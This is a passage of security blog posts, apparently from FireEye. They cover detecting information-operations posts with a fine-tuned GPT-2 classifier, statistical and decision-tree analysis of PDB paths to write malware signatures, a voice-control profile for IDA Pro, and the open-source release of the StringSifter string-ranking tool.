Figure 3: The attention patterns for the query word highlighted in grey from one of the fine-tuned GPT-2 generations in Figure 2. Individual vertical bars represent neuron activations, horizontal bars represent vectors, and lines represent the strength of attention between words. Blue indicates positive values, red indicates negative values, and color intensity represents the magnitude of these values.

Syntactic relationships between words like “America,” “ban,” and “Immigrants“ are valuable from an analysis point of view because they can help identify an information operation’s interrelated keywords and phrases. These indicators can be used to pivot between suspect social media accounts based on shared lexical patterns, help identify common narratives, and even to perform more proactive threat hunting. While the above example only scratches the surface of this complex, 355 million parameter model, qualitatively visualizing attention to understand the information learned by Transformers can help provide analysts insights into linguistic patterns being deployed as part of broader information operations activity.

Detecting Information Operations Activity by Fine-Tuning GPT-2 for Classification

In order to further support FireEye Threat Analysts’ work in discovering and triaging information operations activity on social media, we next fine-tuned a detection model to perform classification. Just like when we adapted GPT-2 for a new language modeling task in the previous section, we did not need to make any drastic architectural changes or parameter updates to fine-tune the model for the classification task. However, we did need to provide the model with a labeled dataset, so we grouped together social media posts based on whether they were leveraged in information operations (class label CLS = 1) or were benign (CLS = 0).

Benign, English-language posts were gathered from verified social media accounts, which generally corresponded to public figures and other prominent individuals or organizations whose posts contained diverse, innocuous content. For the purposes of this blog post, information operations-related posts were obtained from the previously mentioned open source IRA datasets. For the classification task, we separated the IRA datasets that were previously combined for LM fine-tuning, and selected posts from only one of them for the group associated with CLS = 1. To perform dataset selection quantitatively, we fine-tuned LMs on each IRA dataset to produce three different LMs while keeping 33% of the posts from each dataset held out as test data. Doing so allowed us to quantify the overlap between the individual IRA datasets based on how well one dataset’s LM was able to predict post content originating from the other datasets.


Figure 4: Confusion matrix representing perplexities of the LMs on their test datasets. The LM corresponding to the GPT-2 row was not fine-tuned; it corresponds to the pretrained GPT-2 model with reported perplexity of 18.3 on its own test set, which was unavailable for evaluation using the LMs. The Reddit dataset was excluded due to the low volume of samples.

In Figure 4, we show the result of computing perplexity scores for each of the three LMs and the original pre-trained GPT-2 model on held out test data from each dataset. Lower scores indicate better perplexity, which captures the probability of the model choosing the correct next word. The lowest scores fell along the main diagonal of the perplexity confusion matrix, meaning that the fine-tuned LMs were best at predicting the next word on test data originating from within their own datasets. The LM fine-tuned on Twitter’s Elections Integrity dataset displayed the lowest perplexity scores when averaged across all held out test datasets, so we selected posts sampled from this dataset to demonstrate classification fine-tuning.


Figure 5: (A) Training loss histories during GPT-2 fine-tuning for the classification (red) and LM (grey, inset) tasks. (B) ROC curve (red) evaluated on the held out fine-tuning test set, contrasted with random guess (grey dotted).

To fine-tune for the classification task, we once again processed the selected dataset’s posts through the pre-trained GPT-2 model. This time, activations were fed through adjustable weights into two linear output layers instead of just the single one used for the language modeling task in the previous section. Here, fine-tuning was formulated as a multi-task objective with classification loss together with an auxiliary LM loss, which helped accelerate convergence during training and improved the generalization of the model. We also prepended posts with a new [BOS] (i.e. Beginning Of Sentence) string and suffixed posts with the previously mentioned [CLS] class label string, so that each post was fed into the model according to:

“[BOS]Kevin Mandia was on @CNBC’s @MadMoneyOnCNBC with @jimcramer discussing targeted disinformation heading into the… https://t.co/l2xKQJsuwk[CLS]”

The [BOS] string played a similar delimiting role to the <|endoftext|> string used previously in LM fine-tuning, and the [CLS] string encoded the hidden state ∈ {0, 1} that was the label fed to the model’s classification layer. The example social media post above came from the benign dataset, so this sample’s label was set to CLS = 0 during fine-tuning. Figure 5A shows the evolution of classification and auxiliary LM losses during fine-tuning, and Figure 5B displays the ROC curve for the fine-tuned classifier on its test set consisting of around 66,000 social media posts. The convergence of the losses to low values, together with a high Area Under the ROC Curve (i.e. AUC), illustrates that transfer learning allowed this model to accurately detect social media posts associated with IRA information operations activity versus benign ones. Taken together, these metrics indicate that the fine-tuned classifier should generalize well to newly ingested social media posts, providing analysts a capability they can use to separate signal from noise.

Conclusion

In this blog post, we demonstrated how to fine-tune a neural LM on open source datasets containing social media posts previously leveraged in information operations. Transfer learning allowed us to classify these posts with a high AUC score, and FireEye’s Threat Analysts can utilize this detection capability in order to discover and triage similar emergent operations. Additionally, we showed how Transformer models assign scores to different pieces of text via an attention mechanism. This visualization can be used by analysts to tease apart adversary tradecraft based on posts’ linguistic fingerprints and semantic stylings.

Transfer learning also allowed us to generate credible synthetic text with low perplexity scores. One of the barriers actors face when devising effective information operations is adequately capturing the nuances and context of the cultural climate in which their targets are situated. Our exercise here suggests this costly step could be bypassed using pre-trained LMs, whose generations can be fine-tuned to embody the zeitgeist of social media. GPT-2’s authors and subsequent researchers have warned about potential malicious use cases enabled by this powerful natural language generation technology, and while it was conducted here for a defensive application in a controlled offline setting using readily available open source data, our research reinforces this concern. As trends towards more powerful and readily available language generation models continue, it is important to redouble efforts towards detection as demonstrated by Figure 5 and other promising approaches such as Grover.

This research was conducted during a three-month FireEye IGNITE University Program summer internship, and represents a collaboration between the FDS and FireEye Threat Intelligence’s Information Operations Analysis teams. If you are interested in working on multidisciplinary projects at the intersection of cyber security and machine learning, please consider applying to one of our 2020 summer internships.

Definitive Dossier of Devilish Debug Details – Part Deux: A Didactic Deep Dive into Data Driven Deductions

17 October 2019 at 15:30

In Part One of this blog series, Steve Miller outlined what PDB paths are, how they appear in malware, how we use them to detect malicious files, and how we sometimes use them to make associations about groups and actors.

As Steve continued his research into PDB paths, we became interested in applying more general statistical analysis. The PDB path as an artifact poses an intriguing use case for a couple of reasons.

­First, the PDB artifact is not directly tied to the functionality of the binary. As a byproduct of the compilation process, it contains information about the development environment, and by proxy, the malware author themselves. Rarely do we encounter static malware features with such an interesting tie to the human behind the keyboard, rather than the functionality of the file.

Second, file paths are an incredibly complex artifact with many different possible encodings. We had personally been dying to find an excuse to spend more time figuring out how to parse and encode paths in a more useful way. This presented an opportunity to dive into this space and test different approaches to representing file paths in various models.

The objectives of our project were:

  1. Build a large data set of PDB paths and apply some statistical methods to find potentially new signature terms and logic.
  2. Investigate whether applying machine learning classification approaches to this problem could improve our detection above writing hand-crafted signatures.
  3. Build a PDB classifier as a weak signal for binary analysis.

To start, we began gathering data. Our dataset, pulled from internal and external sources, started with over 200,000 samples. Once we deduplicated by PDB path, we had around 50,000 samples. Next, we needed to consistently label these samples, so we considered various labeling schemes.

Labeling Binaries With PDB Paths

For many of the binaries we had internal FireEye labels, and for others we looked up hashes on VirusTotal (VT) to have a look at their detection rates. This covered the majority of our samples. For a relatively small subset we had disagreements between our internal engine and VT results, which merited a slightly more nuanced policy. The disagreement was most often that our internal assessment determined a file to be benign, but the VT results showed a nonzero percentage of vendors detecting the file as malicious. In these cases we plotted the ‘VT ratio”: that is, the percentage of vendors labeling the files as malicious (Figure 1).


Figure 1: Ratio of vendors calling file bad/total number of vendors

The vast majority of these samples had VT detection ratios below 0.3, and in those cases we labeled the binaries as benign. For the remainder of samples we tried two strategies – marking them all as malicious, or removing them from the training set entirely. Our classification performance did not change much between these two policies, so in the end we scrapped the remainder of the samples to reduce label noise.

Building Features

Next, we had to start building features. This is where the fun began. Looking at dozens and dozens of PDB paths, we simply started recording various things that ‘pop out’ to an analyst. As noted earlier, a file path contains tons of implicit information, beyond simply being a string-based artifact. Some analogies we have found useful is that a file path is more akin to a geographical location in its representation of a location on the file system, or like a sentence in that it reflects a series of dependent items.

To further illustrate this point, consider a simple file path such as:

C:\Users\World\Desktop\duck\Zbw138ht2aeja2.pdb (source file)

This path tells us several things:

  • This software was compiled on the system drive of the computer
  • In a user profile, under user ‘World’
  • The project is managed on the Desktop, in a folder called ‘duck’
  • The filename has a high degree of entropy and is not very easy to remember

In contrast, consider something such as:

D:\VSCORE5\BUILD\VSCore\release\EntVUtil.pdb (source file)

This indicates:

  • Compilation on an external or secondary drive
  • Within a non-user directory
  • Contains development terms such as ‘BUILD’ and ‘release’
  • With a sensible, semi-memorable file name

These differences seem relatively straightforward and make intuitive sense as to why one might be representative of malware development whereas the other represents a more “legitimate-looking” development environment.

Feature Representations

How do we represent these differences to a model? The easiest and most obvious option is to calculate some statistics on each path. Features such as folder depth, path length, entropy, and counting things such as numbers, letters, and special characters in the PDB filename are easy to compute.

However, upon evaluation against our dataset, these features did not help to separate the classes very well. The following are some graphics detailing the distributions of these features between our classes of malicious and benign samples:

While there is potentially some separation between benign and malicious distributions, these features alone would likely not lead to an effective classifier (we tried). Additionally, we couldn’t easily translate these differences into explicit detection rules. There was more information in the paths that we needed to extract, so we began to look at how to encode the directory names themselves.

Normalization

As with any dataset, we had to undertake some steps to normalize the paths. For example, the occurrence of individual usernames, while perhaps interesting from an intelligence perspective, would be represented as distinct entities when in fact they have the same semantic meaning. Thus, we had to detect and replace usernames with <username> to normalize this representation. Other folder idiosyncrasies such as version numbers or randomly generated directories could similarly be normalized into <version> or <random>.

A typical normalized path might therefore go from this:

C:\Users\jsmith\Documents\Visual Studio 2013\Projects\mkzyu91952\mkzyu91952\obj\x86\Debug\mkzyu91952.pdb

To this:

c:\users\<username>\documents\visual studio 2013\projects\<random>\<random>\obj\x86\debug\mkzyu91952.pdb

You may notice that the PDB filename itself was not normalized. In this case we wanted to derive features from the filename itself, so we left it. Other approaches could be to normalize it, or even to make note that the same filename string ‘mkzyu91952’ appears earlier in the path. There are endless possible features when dealing with file paths.

Directory Analysis

Once we had normalized directories, we could start to “tokenize” each directory term, to start performing some statistical analysis. Our main goal of this analysis was to see if there were any directory terms that highly corresponded to maliciousness, or see if there were any simple combinations, such as pairs or triplets, that exhibited similar behavior.

We did not find any single directory name that easily separated the classes. That would be too easy. However, we did find some general correlations with directories such as “Desktop” being somewhat more likely to be malicious, and use of shared drives such as Z: to be more indicative of a benign file. This makes intuitive sense given the more collaborative environment a “legitimate” software development process might require. There are, of course, many exceptions and this is what makes the problem tricky.

Another strong signal we found, at least in our dataset, is that when the word “Desktop” was in a non-English language and particularly in a different alphabet, the likelihood of that PDB path being tied to a malicious file was very high (Figure 2). While potentially useful, this can be indicative of geographical bias in our dataset, and further research would need to be done to see if this type of signature would generalize.


Figure 2: Unicode desktop folders from malicious samples

Various Tokenizing Schemes

In recording the directories of a file path, there are several ways you can represent the path. Let’s use this path to illustrate these different approaches:

c:\Leave\smell\Long\ruleThis.pdb (file)

Bag of Words

One very simple way is the “bag-of-words” approach, which simply treats the path as the distinct set of directory names it contains. Therefore, the aforementioned path would be represented as:

[‘c:’,’leave’,’smell’,’long’,’rulethis’]

Positional Analysis

Another approach we considered was recording the position of each directory name, as a distance from the drive. This retained more information about depth, such that a ‘build’ directory on the desktop would be treated differently than a ‘build’ directory nine directories further down. For this purpose, we excluded the drives since they would always have the same depth.

[’leave_1’,’smell_2’,’long_3’,’rulethis_4’]

N-Gram Analysis

Finally, we explored breaking paths into n-grams; that is, as a distinct set of n- adjacent directories. For example, a 2-gram representation of this path might look like:

[‘c:\leave’,’leave\smell’,’smell\long’,’long\rulethis’]

We tested each of these approaches and while positional analysis and n-grams contained more information, in the end, bag-of-words seemed to generalize best. Additionally, using the bag-of-words approach made it easier to extract simple signature logic from the resultant models, as will be shown in a later section.

Term Co-Occurrence

Since we had the bag-of-words vectors created for each path, we were also able to evaluate term co-occurrence across benign and malicious files. When we evaluated the co-occurrence of pairs of terms, we found some other interesting pairings that indeed paint two very different pictures of development environments (Figure 3).

Correlated with Malicious Files

Correlated with Benign Files

users, desktop

src, retail

documents, visual studio 2012

obj, x64

local, temporary projects

src, x86

users, projects

src, win32

users, documents

retail, dynamic

appdata, temporary projects

src, amd64

users, x86

src, x64

Figure 3: Correlated pairs with malicious and benign files

Keyword Lists

Our bag-of-words representation of the PDB paths then gave us a distinct set of nearly 70,000 distinct terms. The vast majority of these terms occurred once or twice in the entire dataset, resulting in what is known as a ‘long-tailed’ distribution. Figure 4 is a graph of only the top 100 most common terms in descending order.


Figure 4: Long tailed distribution of term occurrence

As you can see, the counts drop off quickly, and you are left dealing with an enormous amount of terms that may only appear a handful of times. One very simple way to solve this problem, without losing a ton of information, is to simply cut off a keyword list after a certain number of entries. For example, take the top 50 occurring folder names (across both good and bad files), and save them as a keyword list. Then match this list against every path in the dataset. To create features, one-hot encode each match.  

Rather than arbitrarily setting a cutoff, we wanted to know a bit more about the distribution and understand where might be a good place to set a limit – such that we would cover enough of the samples without drastically increasing the number of features for our model. We therefore calculated the cumulative number of samples covered by each term, as we iterated down the list from most common to least common. Figure 5 is a graph showing the result.


Figure 5: Cumulative share of samples covered by distinct terms

As you can see, with only a small fraction of the terms, we can arrive at a significant percentage of the cumulative total PDB paths. Setting a simple cutoff at about 70% of the dataset resulted in roughly 230 terms for our total vocabulary. This gave us enough information about the dataset without blowing up our model with too many features (and therefore, dimensions). One-hot encoding the presence of these terms was then the final step in featurizing the directory names present in the paths.

YARA Signatures Do Grow on Trees

Armed with some statistical features, as well as one-hot encoded keyword matches, we began to train some models on our now-featurized dataset. In doing so, we hoped to use the model training and evaluation process to give us insights into how to build better signatures. If we developed an effective classification model, that would be an added benefit.

We felt that tree-based models made sense for this use case for two reasons. First, tree-based models have worked well in the past in domains requiring a certain amount of interpretability and using a blend of quantitative and categorical features. Second, the features we used are largely things we could represent in a YARA signature. Therefore, if our models built boolean logic branches that separated large numbers of PDB files, we could potentially translate these into signatures. This is not to say that other model families could not be used to build strong classifiers. Many other options ranging from Logistic Regression to Deep Learning could be considered.

We fed our featurized training set into a Decision Tree, having set a couple ‘hyperparameters’ such as max depth and minimum samples per leaf, etc. We were also able to use a sliding scale of these hyperparameters to dynamically create trees and, essentially, see what shook out. Examining a trained decision tree such as the one in Figure 6 allowed us to immediately build new signatures.


Figure 6: Example decision tree and decision paths

We found several other interesting tidbits within our decision trees. Some terms that resulted in completely or almost-completely malicious subgroups are:

Directory Term

Example Hashes

\poe\

a6b2aa2b489fb481c3cd9eab2f4f4f5c

92904dc99938352525492cd5133b9917

444be936b44cc6bd0cd5d0c88268fa77

\xampp\

4d093061c172b32bf8bef03ac44515ae

4e6c2d60873f644ef5e06a17d85ec777

52d2a08223d0b5cc300f067219021c90

\temporary projects\

a785bd1eb2a8495a93a2f348c9a8ca67

c43c79812d49ca0f3b4da5aca3745090

e540076f48d7069bacb6d607f2d389d9

\stub\

5ea538dfc64e28ad8c4063573a46800c

adf27ce5e67d770321daf90be6f4d895

c6e23da146a6fa2956c3dd7a9314fc97

We also found the term ‘WindowsApplication1’ to be quite useful. 89% of the files in our dataset containing this directory were malicious. Cursory research indicates that this is the default directory generated when using Visual Studio to compile a Windows binary. Once again, this makes some intuitive sense for finding malware authors. Training and evaluating decision trees with various parameters turned out to be a hugely productive exercise in discovering potential new signature terms and logic.

Classification Accuracy and Findings

Since we now had a large dataset of PDB paths and features, we wanted to see if we could train a traditional classifier to separate good files from bad. Using a Random Forest with some tuning, we were able to achieve an average accuracy of 87% over 10 cross validations. However, while our recall (the percentage of bad things we could identify with the model) was relatively high at 89%, our malware precision (the share of those things we called bad that were actually bad) was far too low, hovering at or below 50%. This indicates that using this model alone for malware detection would result in an unacceptably large number of false positives, were we to deploy it in the wild as a singular detection platform. However, used in conjunction with other tools, this could be a useful weak signal to assist with analysis.

Conclusion and Next Steps

While our journey of statistical PDB analysis did not yield a magic malware classifier, it did yield a number of useful findings that we were hoping for:

  1. We developed several file path feature functions which are transferable to other models under development.
  2. By diving into statistical analysis of the dataset, we were able to identify new keywords and logic branches to include in YARA signatures. These signatures have since been deployed and discovered new malware samples.
  3. We answered a number of our own general research questions about PDB paths, and were able to dispel some theories we had not fully tested with data.

While building an independent classifier was not the primary goal, improvements can surely be made to improve the end model accuracy. Generating an even larger, more diverse dataset would likely make the biggest impact on our accuracy, recall, and precision. Further hyperparameter tuning and feature engineering could also help. There is a large amount of established research into text classification using various deep learning methods such as LSTMs, which could be applied effectively to a larger dataset.

PDB paths are only one small family of file paths that we encounter in the field of cyber security. Whether in initial infection, staging, or another part of the attack lifecycle, the file paths found during forensic analysis can reveal incredibly useful information about adversary activity. We look forward to further community research on how to properly extract and represent that information.

IDA, I Think It’s Time You And I Had a Talk: Controlling IDA Pro With Voice Control Software

3 October 2019 at 17:00

Introduction

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing something quite unusual. It is not a tool or a virtual machine distribution, nor is it a plugin or script for a popular reverse engineering tool or framework. Rather, it is a profile created for a consumer software application completely unrelated to reverse engineering or malware analysis… until now. The software is named VoiceAttack, and its purpose is to make it easy for users to control other software on their computer using voice commands. With FLARE’s new profile for VoiceAttack, users can completely control IDA Pro with their voice! Have you ever dreamed of telling IDA Pro to decompile a function or show you the strings of a binary? Well dream no more! Not only does our profile give you total control of the software, it also provides shortcuts and other cool features not previously available. It’s our hope that providing voice control for the world’s most popular disassembler will further empower users with repetitive stress injuries or disabilities to more effectively put their reverse engineering skills to use with this new accessibility option as well as helping the community at large work more efficiently.

Check out our video demonstration of some of the features of the profile to see it in action.

How Does It Work?

Voice attack is an inexpensive software application that utilizes the Windows Speech Recognition (WSR) feature to enable the creation of user-defined, voice-activated macros. The user specifies a key word or phrase, then defines one or more actions to be taken when that word or phrase is recognized. The most common types of actions to be taken include key presses, mouse movement and clicks, and clipboard manipulation. However, there are many other more advanced features available that provide a lot of flexibility to users including variables, loops, and conditionals. You can even have the computer speak to you in response to your commands! VoiceAttack requires an internet connection, but only during the registration process, after which the network adapter can be disabled or configured to a network that cannot reach the internet without issue.

To use VoiceAttack, you must first train Windows Speech Recognition to recognize your voice. Instructions on how to do so can be found here. This process only takes a few minutes at minimum, but the more time you spend training, the better the experience you will have with it.

What Does the IDA Pro Profile Provide?

FLARE’s IDA Pro profile for VoiceAttack maps every advertised keyboard shortcut in IDA Pro to a voice command. Although this is only one part of what the profile provides, many users will find this in itself very useful. When developing this profile, I was shocked to discover just how many keyboard shortcuts there really are for IDA Pro and what can be accomplished with them. Some of my favorite shortcuts are found under the View->Open Subviews and Windows menus. With this profile, I can simply say “show strings” or “show structures” or “show window x” to change the tab I am currently viewing or open a new view in a tab without having to move my mouse cursor anywhere. The next few paragraphs describe some other useful commands to make any reverse engineer’s job easier. For a more detailed description of the profile and commands available, see the Github page.

Macros

A series of voice commands can perform multi-step actions not otherwise reachable by individual keyboard shortcuts. For example, wouldn’t it be nice to have commands to toggle the visibility of opcode bytes (see Figure 1)? Currently, you have to open the Options menu, select the General menu item, input a value in the Number of opcode bytes text field, and click the OK button. Well, now you can simply say “show opcodes” or “hide opcodes” and it will be so!


Figure 1: Configuring the number of opcode bytes to show in IDA Pro's disassembly view

Defining a Unicode string in IDA Pro is a multi-step exercise, whether you navigate to the Edit->Strings menu or use the “string literals” keyboard shortcut Alt+A followed by pressing the U key as shown in Figure 2. Now you can simply say “make Unicode string” and the work is done for you.


Figure 2: String literals dialog in IDA Pro

Reversing a C++ application? The Create struct from selection action is a very helpful feature in this case, but it requires you to navigate to the Edit->Structs menu in order to use it. The voice command “create struct from selection” does this for you automatically. The “look it up” command will copy the currently highlighted token in the disassembly and search Google for it using your default browser. There are several other macros in the profile that are like this and save you a lot of time navigating menus and dialogs to perform simple actions.

Cursor Movement, Dialogs, and Navigation

The cursor movement commands allow the user to move the cursor up, down, left, or right, one or more times, in specified increments. These commands also allow for scrolling with a voice command that commences scrolling in a chosen direction, and another voice command for stopping scrolling. There are even voice commands to set the speed of the scroll to slow, medium, or fast. In the disassembly view, the cursor can also be moved per “word” on the current line of the disassembly or decompilation, or even per basic block or function.

Like many other applications, dialogs are a part of IDA Pro’s user interface. The ability to easily navigate and interact with items in a dialog with your voice is essential to a smooth user experience. Voice commands in the profile enable the user to easily click the OK or Cancel buttons, toggle checkboxes, and tab through controls in the dialog in both directions and in specified increments.

With the aid of a companion IDAPython plugin, additional navigation commands are supported. Commands that allow the user to move the cursor to the beginning or end of the current function, to the next or previous “call” instruction, to the previous or next instruction containing the highlighted token, or to a specified number of bytes forward or backwards from the current cursor position help to make voice-controlled navigation easier.

These cursor movement and navigation commands enable users to have full control of IDA Pro without the use of their hands. While this is true and an important goal for the profile, it is not practical for people who have full use of their hands to go completely hands-free. The commands that navigate the cursor in IDA Pro will never be as fast or easy as simply using the mouse to point and click somewhere on the screen. In any case, users will find themselves building up a collection of voice commands they prefer to use that will depend on personal tastes. However, enabling full voice control allows reverse engineers who do not have full use of their hands to still effectively operate IDA Pro, which we hope will be of great use to the community. Having such a capability is also useful for those who suffer from repetitive strain injury.

Input Recognition

The commands described so far give you control over IDA Pro with your voice, but there is still the matter of providing textual input for items such as function and variable names, comments, and other text input fields. VoiceAttack does provide the ability in macros to enable and disable what is called “Dictation Mode”. When in Dictation Mode, any recognized words are added to a buffer of text until Dictation Mode is disabled. Then this text can be used elsewhere in the macro. Unfortunately, this feature is not designed to recognize the kinds of technical terms one would be using in the context of reverse engineering programs. Even if it were, there is still the issue of having to format the text to be a valid function or variable name. Instead of wrestling with this feature to try to make it work for this purpose, a very large and growing collection of “input recognition” commands was created. These commands are designed to recognize common words used in the names of functions and variables, as well as full function names as found in the C runtime libraries and the Windows APIs. Once recognized, the word or function name is copied to the user’s clipboard and pasted into the text field. To avoid the inadvertent triggering of such commands during the regular operation of IDA Pro, these commands are only active when the “input mode” is enabled. This mode is enabled automatically when certain commands are activated such as “rename” or “find”, and automatically disabled when dialog commands such as “OK” or “cancel” are activated. The input mode can also be manually manipulated with the “input mode on” and “input mode off” commands.

Conclusion

Today, the FLARE team is releasing a profile for VoiceAttack and a companion IDAPython plugin that enables full voice control of IDA Pro along with many added convenience features. The profile contains over 1000 defined commands and growing. It is easy to view, edit, and add commands to this profile to customize it to suit your needs or to improve it for the community at large. The VoiceAttack software is highly affordable and enables you to create profiles for any applications or games that you use. For installation instructions and usage information, see the project’s Github page. Give it a try today!

Open Sourcing StringSifter

7 September 2019 at 17:00

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings that can quickly evoke analyst fatigue, relevant strings occur less often than irrelevant ones, and the definition of "relevant" can vary significantly among analysts. Mistakes can lead to missed clues that would have reduced overall time spent performing malware analysis, or even worse, incomplete or incorrect investigatory conclusions.

Earlier this year, the FireEye Data Science (FDS) and FireEye Labs Reverse Engineering (FLARE) teams published a blog post describing a machine learning model that automatically ranked strings to address these concerns. Today, we publicly release this model as part of StringSifter, a utility that identifies and prioritizes strings according to their relevance for malware analysis.

Goals

StringSifter is built to sit downstream from the Strings program; it takes a list of strings as input and returns those same strings ranked according to their relevance for malware analysis as output. It is intended to make an analyst's life easier, allowing them to focus their attention on only the most relevant strings located towards the top of its predicted output. StringSifter is designed to be seamlessly plugged into a user’s existing malware analysis stack. Once its GitHub repository is cloned and installed locally, it can be conveniently invoked from the command line with its default arguments according to:

strings <sample_of_interest> | rank_strings

We are also providing Docker command line tools for additional portability and usability. For a more detailed overview of how to use StringSifter, including how to specify optional arguments for customizable functionality, please view its README file on GitHub.

We have received great initial internal feedback about StringSifter from FireEye’s reverse engineers, SOC analysts, red teamers, and incident responders. Encouragingly, we have also observed users at the opposite ends of the experience spectrum find the tool to be useful – from beginners detonating their first piece of malware as part of a FireEye training course – to expert malware researchers triaging incoming samples on the front lines. By making StringSifter publicly available, we hope to enable a broad set of personas, use cases, and creative downstream applications. We will also welcome external contributions to help improve the tool’s accuracy and utility in future releases.

Conclusion

We are releasing StringSifter to coincide with our presentation at DerbyCon 2019 on Sept. 7, and we will also be doing a technical dive into the model at the Conference on Applied Machine Learning for Information Security this October. With its release, StringSifter will join FLARE VM, FakeNet, and CommandoVM as one of many recent malware analysis tools that FireEye has chosen to make publicly available. If you are interested in developing data-driven tools that make it easier to find evil and help benefit the security community, please consider joining the FDS or FLARE teams by applying to one of our job openings.

❌